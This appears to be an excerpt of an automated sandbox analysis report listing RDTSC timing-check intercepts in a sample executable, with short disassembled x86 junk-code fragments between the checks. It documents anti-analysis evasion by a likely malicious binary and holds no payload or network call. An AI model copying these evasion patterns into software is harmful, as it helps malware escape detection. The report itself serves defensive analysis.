Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C151FD second address: C1522E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jc 00007F702D6C0E46h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push esi 0x0000000d jno 00007F702D6C0E46h 0x00000013 jno 00007F702D6C0E46h 0x00000019 pop esi 0x0000001a jl 00007F702D6C0E4Eh 0x00000020 pushad 0x00000021 popad 0x00000022 jng 00007F702D6C0E46h 0x00000028 pushad 0x00000029 ja 00007F702D6C0E46h 0x0000002f push eax 0x00000030 push edx 0x00000031 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C1522E second address: C15234 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C173A5 second address: C173AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C17482 second address: C17487 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BA2CC6 second address: BA2CCC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C1AE33 second address: C1AE38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C1AE38 second address: C1AE3E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C1AE3E second address: C1AE42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C1B67C second address: C1B68B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jp 00007F702D6C0E46h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C1B68B second address: C1B69B instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F702C87CB96h 0x00000008 jc 00007F702C87CB96h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C1B7C1 second address: C1B7C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C1B7C5 second address: C1B7CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C1B7CB second address: C1B7DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F702D6C0E4Ah 0x00000009 jp 00007F702D6C0E46h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C1B7DF second address: C1B7E5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C1BAEE second address: C1BB15 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F702D6C0E46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f jmp 00007F702D6C0E57h 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C1BB15 second address: C1BB30 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F702C87CBA5h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C1BB30 second address: C1BB34 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C1BB34 second address: C1BB3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C1BCD7 second address: C1BCEC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F702D6C0E51h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C1BCEC second address: C1BD0A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pop edx 0x00000006 jmp 00007F702C87CB9Bh 0x0000000b pop edx 0x0000000c pop eax 0x0000000d ja 00007F702C87CBA0h 0x00000013 pushad 0x00000014 push ebx 0x00000015 pop ebx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C1BE59 second address: C1BE77 instructions: 0x00000000 rdtsc 0x00000002 je 00007F702D6C0E46h 0x00000008 jmp 00007F702D6C0E54h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C1F463 second address: C1F467 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C1F467 second address: C1F480 instructions: 0x00000000 rdtsc 0x00000002 je 00007F702D6C0E46h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F702D6C0E4Dh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BA120E second address: BA122E instructions: 0x00000000 rdtsc 0x00000002 jc 00007F702C87CB96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F702C87CB9Fh 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BA122E second address: BA1232 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BA1232 second address: BA123E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnl 00007F702C87CB96h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BA123E second address: BA1245 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C23F1C second address: C23F63 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jmp 00007F702C87CBA8h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b je 00007F702C87CBA2h 0x00000011 jmp 00007F702C87CB9Ch 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 jl 00007F702C87CB98h 0x0000001f pushad 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C23F63 second address: C23F6E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 ja 00007F702D6C0E46h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C23F6E second address: C23F7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jbe 00007F702C87CB96h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C2427D second address: C24283 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C24283 second address: C2429B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F702C87CBA4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C2443D second address: C24447 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F702D6C0E46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C245E2 second address: C245E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C245E8 second address: C245EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C245EE second address: C245F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C245F5 second address: C24613 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F702D6C0E59h 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C2BE8A second address: C2BE91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C2BE91 second address: C2BEA5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F702D6C0E4Eh 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C2BEA5 second address: C2BEA9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C2BEA9 second address: C2BEB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C2BEB6 second address: C2BED7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F702C87CB96h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007F702C87CBA2h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C2BED7 second address: C2BEDD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C2BEDD second address: C2BEFB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F702C87CBA7h 0x00000007 push eax 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C2AD40 second address: C2AD47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop eax 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BEAEBB second address: BEAEC6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 push edi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BEAEC6 second address: BEAF1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jmp 00007F702D6C0E4Ch 0x0000000a popad 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push ecx 0x0000000f call 00007F702D6C0E48h 0x00000014 pop ecx 0x00000015 mov dword ptr [esp+04h], ecx 0x00000019 add dword ptr [esp+04h], 00000015h 0x00000021 inc ecx 0x00000022 push ecx 0x00000023 ret 0x00000024 pop ecx 0x00000025 ret 0x00000026 sub dword ptr [ebp+122D29BBh], eax 0x0000002c jnl 00007F702D6C0E4Ch 0x00000032 add edi, dword ptr [ebp+122D394Ch] 0x00000038 lea eax, dword ptr [ebp+1247EC5Fh] 0x0000003e or ecx, dword ptr [ebp+122D3868h] 0x00000044 push eax 0x00000045 push eax 0x00000046 push edx 0x00000047 push eax 0x00000048 push edx 0x00000049 jc 00007F702D6C0E46h 0x0000004f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BEAF1F second address: BEAF25 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BEAF25 second address: BEAF2A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BEAF2A second address: BD502A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a xor dx, 5460h 0x0000000f call dword ptr [ebp+1246214Dh] 0x00000015 jmp 00007F702C87CB9Eh 0x0000001a push eax 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F702C87CB9Ch 0x00000022 pushad 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BEB3DA second address: BEB3F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F702D6C0E58h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BEB630 second address: BEB635 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BEB635 second address: BEB659 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a mov di, ax 0x0000000d nop 0x0000000e pushad 0x0000000f jmp 00007F702D6C0E51h 0x00000014 push eax 0x00000015 push edx 0x00000016 push edi 0x00000017 pop edi 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BEBC3D second address: BEBC74 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F702C87CB96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b nop 0x0000000c add ecx, dword ptr [ebp+122D2A75h] 0x00000012 push 0000001Eh 0x00000014 push esi 0x00000015 jmp 00007F702C87CBA2h 0x0000001a pop edx 0x0000001b nop 0x0000001c push eax 0x0000001d push edx 0x0000001e jp 00007F702C87CB9Ch 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BEBC70 second address: BEBC74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BEBF3D second address: BEBF5E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F702C87CBA7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d push edx 0x0000000e pop edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BEBF5E second address: BEBFA1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F702D6C0E51h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F702D6C0E48h 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 mov eax, dword ptr [esp+04h] 0x00000016 pushad 0x00000017 jmp 00007F702D6C0E51h 0x0000001c pushad 0x0000001d jmp 00007F702D6C0E4Ch 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BEC036 second address: BEC03A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BEC03A second address: BEC03E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BEC03E second address: BEC098 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push edi 0x0000000d call 00007F702C87CB98h 0x00000012 pop edi 0x00000013 mov dword ptr [esp+04h], edi 0x00000017 add dword ptr [esp+04h], 0000001Ah 0x0000001f inc edi 0x00000020 push edi 0x00000021 ret 0x00000022 pop edi 0x00000023 ret 0x00000024 sbb cx, 3E28h 0x00000029 jmp 00007F702C87CBA7h 0x0000002e lea eax, dword ptr [ebp+1247ECA3h] 0x00000034 mov edi, dword ptr [ebp+122D385Ch] 0x0000003a push eax 0x0000003b pushad 0x0000003c push eax 0x0000003d push edx 0x0000003e push eax 0x0000003f push edx 0x00000040 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BEC098 second address: BEC09C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BEC09C second address: BEC0A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BEC0A0 second address: BD5B2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F702D6C0E4Bh 0x0000000c jmp 00007F702D6C0E53h 0x00000011 popad 0x00000012 popad 0x00000013 mov dword ptr [esp], eax 0x00000016 and edx, dword ptr [ebp+122D2A75h] 0x0000001c lea eax, dword ptr [ebp+1247EC5Fh] 0x00000022 movzx edi, dx 0x00000025 mov edi, dword ptr [ebp+122D37E0h] 0x0000002b nop 0x0000002c jmp 00007F702D6C0E4Eh 0x00000031 push eax 0x00000032 push ebx 0x00000033 push edi 0x00000034 jg 00007F702D6C0E46h 0x0000003a pop edi 0x0000003b pop ebx 0x0000003c nop 0x0000003d mov ecx, dword ptr [ebp+122D360Ch] 0x00000043 call dword ptr [ebp+122D1F10h] 0x00000049 pushad 0x0000004a push esi 0x0000004b js 00007F702D6C0E46h 0x00000051 jmp 00007F702D6C0E53h 0x00000056 pop esi 0x00000057 push eax 0x00000058 push edx 0x00000059 jns 00007F702D6C0E46h 0x0000005f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BD5B2B second address: BD5B2F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C2B151 second address: C2B16F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F702D6C0E53h 0x00000009 jne 00007F702D6C0E46h 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C2B16F second address: C2B186 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jmp 00007F702C87CBA1h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C2B186 second address: C2B18A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C2B2F0 second address: C2B2FA instructions: 0x00000000 rdtsc 0x00000002 js 00007F702C87CB96h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C2B2FA second address: C2B320 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 jbe 00007F702D6C0E46h 0x0000000d pop ebx 0x0000000e popad 0x0000000f push esi 0x00000010 pushad 0x00000011 jnl 00007F702D6C0E46h 0x00000017 jbe 00007F702D6C0E46h 0x0000001d pushad 0x0000001e popad 0x0000001f popad 0x00000020 push eax 0x00000021 push edx 0x00000022 push edx 0x00000023 pop edx 0x00000024 pushad 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C2B473 second address: C2B479 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C2B479 second address: C2B47D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C2B47D second address: C2B483 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C2B483 second address: C2B488 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C2B488 second address: C2B4D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F702C87CBA6h 0x00000009 push esi 0x0000000a pop esi 0x0000000b popad 0x0000000c jmp 00007F702C87CBA7h 0x00000011 pop edx 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F702C87CBA4h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C2B4D4 second address: C2B4DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C2B4DA second address: C2B4EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F702C87CBA0h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C2B4EE second address: C2B50B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F702D6C0E54h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C2B7FC second address: C2B80C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnp 00007F702C87CB96h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C2B80C second address: C2B810 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C2B810 second address: C2B814 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C2BA7B second address: C2BA7F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C2BA7F second address: C2BA85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C2BA85 second address: C2BA97 instructions: 0x00000000 rdtsc 0x00000002 je 00007F702D6C0E4Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C2BA97 second address: C2BA9B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BA46CB second address: BA46CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C302B4 second address: C302B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C3053C second address: C30542 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C30542 second address: C3054E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C3054E second address: C30553 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C30553 second address: C3056C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jl 00007F702C87CB96h 0x00000009 jnc 00007F702C87CB96h 0x0000000f jbe 00007F702C87CB96h 0x00000015 popad 0x00000016 push edi 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C3056C second address: C3057E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a js 00007F702D6C0E46h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C3057E second address: C30582 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C30582 second address: C30588 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C30588 second address: C30592 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C3095B second address: C30961 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
